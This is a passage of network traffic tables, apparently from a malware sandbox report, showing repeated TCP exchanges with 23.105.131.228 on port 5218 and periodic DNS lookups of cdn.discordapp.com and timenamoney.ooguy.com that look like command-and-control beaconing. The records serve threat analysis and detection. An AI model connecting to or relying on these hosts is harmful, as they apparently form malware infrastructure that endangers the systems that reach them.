                                                                                      May 26, 2022 23:04:13.416383982 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.416553020 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.436805964 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.439858913 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.439951897 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.440002918 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.440421104 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.440498114 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.440609932 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.440632105 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.440727949 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.440819979 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.440860987 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.440875053 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.440984011 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441009998 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.441102028 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441118002 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.441236973 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441298008 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.441394091 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441405058 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441410065 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.441503048 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441533089 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.441536903 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.441638947 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441735983 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441859961 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.441986084 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442035913 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442234993 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442286015 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442359924 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442487955 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442610979 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442662001 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442684889 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.442688942 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.442738056 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442796946 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.442800045 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.442986012 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.442997932 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.443001032 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.443038940 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.443156958 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.443181038 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.443289042 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.443361998 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.443375111 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.443378925 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.443381071 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.443566084 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.443569899 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.443948984 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.444137096 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.444140911 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.492919922 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.493053913 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.493187904 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.493310928 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.493441105 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.493490934 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.493716955 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.493818998 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.493825912 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.493841887 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.493854046 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494061947 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494184971 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494204998 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.494210005 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.494211912 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.494337082 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494347095 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494434118 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494590998 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.494601011 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494716883 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494811058 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.494852066 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.494954109 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.495052099 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495054960 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495064020 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.495186090 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.495310068 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.495359898 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.495363951 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495367050 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495368958 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495738983 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495742083 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495744944 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495981932 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.495985031 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.501899004 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.502072096 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.502085924 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.502165079 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.502274036 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.502372026 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.502379894 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.502507925 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.502516985 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.502652884 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.502742052 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.502742052 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.502862930 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.502871037 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.502912045 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.503026009 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.503129005 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.503211975 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.505701065 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.505887985 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.506072044 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.506076097 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.744587898 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.744673967 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.744744062 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.744790077 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.744824886 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.744879961 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.744893074 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.744960070 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.813394070 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.813463926 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.813528061 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.813574076 CEST52184986523.105.131.228192.168.11.20
                                                                                      May 26, 2022 23:04:13.813672066 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.813723087 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.813735962 CEST498655218192.168.11.2023.105.131.228
                                                                                      May 26, 2022 23:04:13.902611971 CEST498655218192.168.11.2023.105.131.228
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 26, 2022 22:56:17.944097042 CEST5908853192.168.11.201.1.1.1
                                                                                      May 26, 2022 22:56:17.952687979 CEST53590881.1.1.1192.168.11.20
                                                                                      May 26, 2022 22:56:19.370522022 CEST4947653192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:56:19.502645016 CEST53494768.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:56:25.761801004 CEST5609453192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:56:25.915883064 CEST53560948.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:56:32.109195948 CEST5142453192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:56:32.275470972 CEST53514248.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:56:38.469002008 CEST5440253192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:56:38.598752975 CEST53544028.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:56:44.759712934 CEST5294853192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:56:44.889226913 CEST53529488.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:56:51.119111061 CEST6024553192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:56:51.286528111 CEST53602458.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:56:57.556022882 CEST4946753192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:56:57.564409018 CEST53494678.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:03.795886993 CEST6309253192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:03.948545933 CEST53630928.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:10.235336065 CEST6227053192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:10.365535975 CEST53622708.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:16.583590031 CEST4992053192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:16.592194080 CEST53499208.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:23.941036940 CEST5271353192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:23.951476097 CEST53527138.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:30.142916918 CEST5129553192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:30.153330088 CEST53512958.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:36.447880030 CEST6453553192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:36.458362103 CEST53645358.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:42.765239000 CEST5397253192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:42.775795937 CEST53539728.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:49.071717024 CEST6212553192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:49.079962015 CEST53621258.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:57:55.387375116 CEST5770353192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:57:55.396287918 CEST53577038.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:02.714227915 CEST5563153192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:02.722851038 CEST53556318.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:08.790844917 CEST5662053192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:08.801352024 CEST53566208.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:14.961462975 CEST6544953192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:14.970187902 CEST53654498.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:19.725739002 CEST5202653192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:19.884291887 CEST53520268.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:25.958996058 CEST6179553192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:25.967468023 CEST53617958.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:32.132129908 CEST6099053192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:32.140337944 CEST53609908.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:38.362163067 CEST5797753192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:38.373121977 CEST53579778.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:44.439168930 CEST6375453192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:44.594331026 CEST53637548.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:50.673515081 CEST5585453192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:50.684278965 CEST53558548.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:58:56.796745062 CEST5820353192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:58:56.924204111 CEST53582038.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:03.044397116 CEST5297753192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:03.204742908 CEST53529778.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:09.314876080 CEST5814853192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:09.475416899 CEST53581488.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:15.620628119 CEST5072053192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:15.750709057 CEST53507208.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:21.887063980 CEST5423853192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:21.897727013 CEST53542388.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:27.961395025 CEST6471253192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:27.969963074 CEST53647128.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:34.132642031 CEST5672753192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:34.143362999 CEST53567278.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:40.239417076 CEST5885153192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:40.408190966 CEST53588518.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:46.565993071 CEST6321053192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:46.574675083 CEST53632108.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:52.736718893 CEST5517253192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:52.747231960 CEST53551728.8.8.8192.168.11.20
                                                                                      May 26, 2022 22:59:58.798115015 CEST5706153192.168.11.208.8.8.8
                                                                                      May 26, 2022 22:59:58.808669090 CEST53570618.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:04.921264887 CEST5886753192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:04.931792974 CEST53588678.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:11.045850039 CEST5559353192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:11.056566954 CEST53555938.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:17.185695887 CEST5020153192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:17.313097954 CEST53502018.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:23.418376923 CEST5826353192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:23.427269936 CEST53582638.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:29.525124073 CEST5818453192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:29.534392118 CEST53581848.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:35.655673981 CEST6255653192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:35.663703918 CEST53625568.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:41.772674084 CEST5688853192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:41.783401966 CEST53568888.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:47.911969900 CEST5010053192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:47.920675039 CEST53501008.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:00:54.066659927 CEST5233353192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:00:54.076555014 CEST53523338.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:00.143632889 CEST6170353192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:00.154145002 CEST53617038.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:06.314536095 CEST5493453192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:06.323120117 CEST53549348.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:12.437952995 CEST5181353192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:12.448194981 CEST53518138.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:18.568036079 CEST6208653192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:18.576674938 CEST53620868.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:24.687258959 CEST5714053192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:24.695985079 CEST53571408.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:30.761780977 CEST5995053192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:30.772237062 CEST53599508.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:36.932429075 CEST6160453192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:36.942620993 CEST53616048.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:43.025840044 CEST5592753192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:43.156709909 CEST53559278.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:49.461431026 CEST5956553192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:49.470392942 CEST53595658.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:01:55.631266117 CEST4996353192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:01:55.640096903 CEST53499638.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:01.723764896 CEST5606853192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:01.734304905 CEST53560688.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:07.836009026 CEST5076853192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:07.846244097 CEST53507688.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:13.970880032 CEST5853053192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:13.979751110 CEST53585308.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:20.081634998 CEST5448153192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:20.092257977 CEST53544818.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:26.207834005 CEST6340053192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:26.218049049 CEST53634008.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:32.328444004 CEST6258153192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:32.498123884 CEST53625818.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:37.926033974 CEST5718853192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:37.934736967 CEST53571888.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:44.027009964 CEST5304753192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:44.036978960 CEST53530478.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:50.213300943 CEST5839653192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:50.223522902 CEST53583968.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:02:56.289926052 CEST5865653192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:02:56.419696093 CEST53586568.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:02.508759975 CEST5030153192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:02.518985033 CEST53503018.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:08.634332895 CEST5112553192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:08.643898010 CEST53511258.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:14.755961895 CEST5475953192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:14.766194105 CEST53547598.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:20.878443956 CEST4965753192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:20.888705969 CEST53496578.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:27.003328085 CEST5591053192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:27.013995886 CEST53559108.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:33.125438929 CEST5806253192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:33.133816957 CEST53580628.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:39.257931948 CEST5853853192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:39.268352032 CEST53585388.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:45.420042992 CEST5831753192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:45.429908037 CEST53583178.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:51.497894049 CEST6016953192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:51.506457090 CEST53601698.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:03:57.619930983 CEST5014553192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:03:57.787252903 CEST53501458.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:04:03.870403051 CEST5996153192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:04:04.032357931 CEST53599618.8.8.8192.168.11.20
                                                                                      May 26, 2022 23:04:10.195959091 CEST5228253192.168.11.208.8.8.8
                                                                                      May 26, 2022 23:04:10.354782104 CEST53522828.8.8.8192.168.11.20
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      May 26, 2022 22:56:17.944097042 CEST192.168.11.201.1.1.10xa78bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:19.370522022 CEST192.168.11.208.8.8.80x25d0Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:25.761801004 CEST192.168.11.208.8.8.80x58c5Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:32.109195948 CEST192.168.11.208.8.8.80xc137Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:38.469002008 CEST192.168.11.208.8.8.80x9572Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:44.759712934 CEST192.168.11.208.8.8.80xfe65Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:51.119111061 CEST192.168.11.208.8.8.80x3583Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:56:57.556022882 CEST192.168.11.208.8.8.80xcb10Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:03.795886993 CEST192.168.11.208.8.8.80xa00eStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:10.235336065 CEST192.168.11.208.8.8.80x410bStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:16.583590031 CEST192.168.11.208.8.8.80xccfeStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:23.941036940 CEST192.168.11.208.8.8.80xcf99Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:30.142916918 CEST192.168.11.208.8.8.80x48dcStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:36.447880030 CEST192.168.11.208.8.8.80x2682Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:42.765239000 CEST192.168.11.208.8.8.80x2648Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:49.071717024 CEST192.168.11.208.8.8.80xb6b7Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:57:55.387375116 CEST192.168.11.208.8.8.80x66dbStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:02.714227915 CEST192.168.11.208.8.8.80xe7f0Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:08.790844917 CEST192.168.11.208.8.8.80x7b6eStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:14.961462975 CEST192.168.11.208.8.8.80xa9eStandard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:19.725739002 CEST192.168.11.208.8.8.80xa8b4Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:25.958996058 CEST192.168.11.208.8.8.80x1405Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:32.132129908 CEST192.168.11.208.8.8.80x5361Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:38.362163067 CEST192.168.11.208.8.8.80xd343Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
                                                                                      May 26, 2022 22:58:44.439168930 CEST192.168.11.208.8.8.80x9599Standard query (0)timenamoney.ooguy.comA (IP address)IN (0x0001)
